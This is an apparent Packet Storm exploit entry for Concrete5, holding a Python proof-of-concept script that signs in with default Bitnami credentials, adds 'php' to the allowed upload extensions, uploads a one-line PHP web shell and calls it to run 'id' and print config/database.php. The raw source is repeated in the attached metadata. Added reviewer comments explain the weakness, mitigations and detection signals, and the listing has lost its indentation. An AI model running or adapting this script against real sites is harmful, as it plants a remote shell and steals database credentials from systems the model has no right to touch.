ID PACKETSTORM:142732
Type packetstorm
Reporter Cody Sixteen
Modified 2017-05-28T00:00:00
Description
`c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
#!/usr/bin/env python
# shell-concrete5.py - module based on previous version
# created 29.04.2017. Bug ('feature') is exploitable only
# when you have valid credentials.
#
# Reviewer summary (defender's reading of this PoC):
#   The script logs in to a Concrete5 instance with hard-coded
#   credentials, uses the dashboard's "file access extensions" setting
#   to add 'php' to the list of allowed upload extensions, uploads a
#   one-line PHP file through the regular file manager, and finally
#   requests that file under /application/files/ expecting the web
#   server to execute it.  Nothing here bypasses authentication: the
#   precondition is a valid account, presumably an administrator, since
#   the extension list lives under /dashboard/system/.
#   The weakness demonstrated is that a user-editable allow-list decides
#   whether an upload may be server-executed code, and that uploads are
#   stored in a web-served, PHP-handled path.
#
#   Mitigation notes: keep 'php' (and other server-executed extensions)
#   out of the allowed-extension list and enforce that server-side
#   regardless of the dashboard setting; disable script execution for
#   the upload directory or store uploads outside the document root;
#   replace any vendor/default credentials.
#   Detection notes: the observable steps of this script are a POST to
#   .../files/filetypes/file_access_extensions whose list contains
#   'php', an upload of a *.php file via /ccm/system/file/upload, and a
#   GET of /application/files/<subpath>/*.php carrying a query string.
#
# NOTE(review): indentation was lost in this listing, so the statements
# that follow each `if ...:` below presumably belonged to that block in
# the original file; read the control flow accordingly.
import sys  # unused in the visible code
import re
import requests
# `target` is concatenated straight into URLs, so it has to carry the
# scheme and host (e.g. http://host), not a bare hostname.
target = raw_input("[+] Hostname> ")
logMe = target + '/index.php/login'
# A single session object carries the login cookie through every request.
session = requests.session()
initreq = session.get(logMe)
initresp = initreq.text
# Concrete5 forms carry a hidden ccm_token; it is scraped from the login
# page so the authentication POST below is accepted.
gettoken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
found = re.search(gettoken, initresp)
if found:
token = found.group(1)
print '[+] Found token: ' + str(token)
# assuming token is valid, let's log in
# Hard-coded credentials: 'user' / 'bitnami' look like the Bitnami stack
# defaults (confirm); deployments still on vendor defaults are the
# realistic victims of this PoC.
login_data = {
'uName':'user',
'uPassword':'bitnami',
'ccm_token':token
}
loglink = target + '/index.php/login/authenticate/concrete'
loginreq = session.post(loglink, data=login_data)
#afterlogin = target + '/index.php/dashboard/system'
# The login response is never inspected; success is simply assumed.
afterlogin = target + '/index.php/dashboard/system/files/filetypes'
nextreq1 = session.get(afterlogin)
nextresp1 = nextreq1.text
print '[+] Cool, we\'re logged-in!'
#print afterlogin
#print nextresp1
print '[+] We are ready to go, extension-page is available.'
print ''
# construct POST with new.ext
# A second ccm_token is scraped from the file-types dashboard page.
newToken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
foundToken = re.search(newToken, nextresp1)
if foundToken:
newOne = foundToken.group(1)
print '[+] New token grabbed: ' + str(newOne)
# Core of the issue: the allowed-upload-extension list is an ordinary
# editable setting, and 'php' is just written into it.
data_ext = {
'ccm_token':newOne,
'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'
}
datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'
datareq = session.post(datalink, data=data_ext)
dataresp = datareq.text
# Reads the textarea back from the response to confirm the list changed.
nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)</textarea>')
newexts = re.search(nowwecan, dataresp)
if newexts:
print '[+] Available now: '+ newexts.group(1)
print '[+] Time to upload shell...'
# next token to upload request
nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'
tokreq3 = session.get(nextTokenUrl)
tokresp3 = tokreq3.text
grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')
foundit = re.search(grabNextTok, tokresp3)
if foundit:
tokentoup = foundit.group(1)
print '[+] Next token (3rd): ' + str( tokentoup )
# we are logged-in; preparing req to upload shell
# The payload is written to the local working directory and never
# removed, so 'meshell3.php' remains as an artifact on the operator's
# host as well as on the target.
saymyname = 'meshell3.php'
fp = open(saymyname,'w')
fp.write('<?php system($_GET["xx"]);')
fp.close()
# tmpshfile ready, do req now
# This second handle is never closed; it is left to interpreter exit.
up_files = { 'file':open(saymyname,'rb') }
up_params = {
'ccm_token':tokentoup,
'filename':saymyname,
'currentFolder':'0'
}
# Regular file-manager upload endpoint, used once 'php' is allowed.
upreqlink = target + '/index.php/ccm/system/file/upload'
upreqnow = session.post(upreqlink, files=up_files, data=up_params)
upresp = upreqnow.text
if saymyname in upresp:
print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')'
# The file-search page embeds per-file JSON; the file ID is pulled out
# of the 'view_inline' URL fragment (regex group 3) and stripped of '/'.
searchme = target + '/index.php/dashboard/files/search'
dosearch = session.get(searchme)
meresp = dosearch.text
searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":')
foundShLink = re.search(searchShLink, meresp)
if foundShLink:
foundId = foundShLink.group(3)
shid = foundId.strip('\/')
print '[+] Found link ID:' + str(shid)
# The properties dialog links to the stored file under
# /application/files/<subpath>/<name>; group 2 captures that subpath.
preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid)
prepreq = session.get(preparingProp)
prepresp = prepreq.text
whereareutxt = '<a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'">'
whereareu = re.compile(whereareutxt)
foundme2 = re.search(whereareu, prepresp)
if foundme2:
print '[+] Shell is ready to use:'
# A direct GET of the uploaded file is the actual proof of impact: the
# script expects the server to run it as PHP rather than serve it.
shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'
print ' ' + shellshere
print '[+] "Finish him!" ;7'
finish = session.get(shellshere)
fintxt = finish.text
print '[+] Response:'
print fintxt
print '\n---------------'
# Presumably the else-branch of `if saymyname in upresp:` (nesting lost).
else:
print '[-] I can not upload our shell. Verify!'
`
{"id": "PACKETSTORM:142732", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Concrete5 Proof Of Concept Shell Upload", "description": "", "published": "2017-05-28T00:00:00", "modified": "2017-05-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/142732/Concrete5-Proof-Of-Concept-Shell-Upload.html", "reporter": "Cody Sixteen", "references": [], "cvelist": [], "lastseen": "2017-05-31T13:20:10", "viewCount": 12, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-05-31T13:20:10", "rev": 2}, "dependencies": {"references": [], "modified": "2017-05-31T13:20:10", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/142732/shell-concrete5.py.txt", "sourceData": "`c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py \n#!/usr/bin/env python \n# shell-concrete5.py - module based on previous version \n# created 29.04.2017. Bug ('feature') is exploitable only \n# when you will have a valid credentials. \nimport sys \nimport re \nimport requests \n \ntarget = raw_input(\"[+] Hostname> \") \nlogMe = target + '/index.php/login' \nsession = requests.session() \n \ninitreq = session.get(logMe) \ninitresp = initreq.text \n \ngettoken = re.compile('<input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfound = re.search(gettoken, initresp) \n \nif found: \ntoken = found.group(1) \nprint '[+] Found token: ' + str(token) \n \n \n# assuming token is valid, let's log in \nlogin_data = { \n'uName':'user', \n'uPassword':'bitnami', \n'ccm_token':token \n} \nloglink = target + '/index.php/login/authenticate/concrete' \nloginreq = session.post(loglink, data=login_data) \n \n#afterlogin = target + '/index.php/dashboard/system' \nafterlogin = target + '/index.php/dashboard/system/files/filetypes' \nnextreq1 = session.get(afterlogin) \nnextresp1 = nextreq1.text \nprint '[+] Cool, we\\'re logged-in!' 
\n#print afterlogin \n#print nextresp1 \nprint '[+] We are ready to go, extension-page is available.' \nprint '' \n \n# construct POST with new.ext \nnewToken = re.compile('<input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfoundToken = re.search(newToken, nextresp1) \n \nif foundToken: \nnewOne = foundToken.group(1) \nprint '[+] New token grabbed: ' + str(newOne) \n \ndata_ext = { \n'ccm_token':newOne, \n'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone' \n} \ndatalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions' \ndatareq = session.post(datalink, data=data_ext) \ndataresp = datareq.text \nnowwecan = re.compile('file-access-file-types\" class=\"form-control\" rows=\"3\">(.*?)</textarea>') \nnewexts = re.search(nowwecan, dataresp) \n \nif newexts: \nprint '[+] Available now: '+ newexts.group(1) \n \nprint '[+] Time to upload shell...' \n \n# next token to upload request \nnextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0' \ntokreq3 = session.get(nextTokenUrl) \ntokresp3 = tokreq3.text \n \ngrabNextTok = re.compile('input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfoundit = re.search(grabNextTok, tokresp3) \n \nif foundit: \ntokentoup = foundit.group(1) \nprint '[+] Next token (3rd): ' + str( tokentoup ) \n \n# we are logged-in; preparing req to upload shell \nsaymyname = 'meshell3.php' \n \nfp = open(saymyname,'w') \nfp.write('<?php system($_GET[\"xx\"]);') \nfp.close() \n \n# tmpshfile ready, do req now \nup_files = { 'file':open(saymyname,'rb') } \n \nup_params = { \n'ccm_token':tokentoup, \n'filename':saymyname, \n'currentFolder':'0' \n} \nupreqlink = target + '/index.php/ccm/system/file/upload' \nupreqnow = session.post(upreqlink, files=up_files, data=up_params) \nupresp = upreqnow.text \nif saymyname in upresp: \nprint '[+] Shell properly uploaded. 
Time to find it ('+str(saymyname)+')' \n \nsearchme = target + '/index.php/dashboard/files/search' \ndosearch = session.get(searchme) \nmeresp = dosearch.text \n \nsearchShLink = re.compile(saymyname+'\",\"urlInline\":\"http:(.*?)download_file(.*?)view_inline(.*?)\",\"urlDownload\":') \nfoundShLink = re.search(searchShLink, meresp) \n \nif foundShLink: \nfoundId = foundShLink.group(3) \nshid = foundId.strip('\\/') \nprint '[+] Found link ID:' + str(shid) \n \npreparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid) \nprepreq = session.get(preparingProp) \nprepresp = prepreq.text \nwhereareutxt = '<a target=\"_blank\" href=\"(.*?)/application/files/(.*?)' + saymyname +'\">' \nwhereareu = re.compile(whereareutxt) \nfoundme2 = re.search(whereareu, prepresp) \n \nif foundme2: \nprint '[+] Shell is ready to use:' \nshellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id' \nprint ' ' + shellshere \n \nprint '[+] \"Finish him!\" ;7' \nfinish = session.get(shellshere) \nfintxt = finish.text \nprint '[+] Response:' \nprint fintxt \nprint '\\n---------------' \n \nelse: \nprint '[-] I can not upload our shell. Verify!' \n \n`\n"}
{}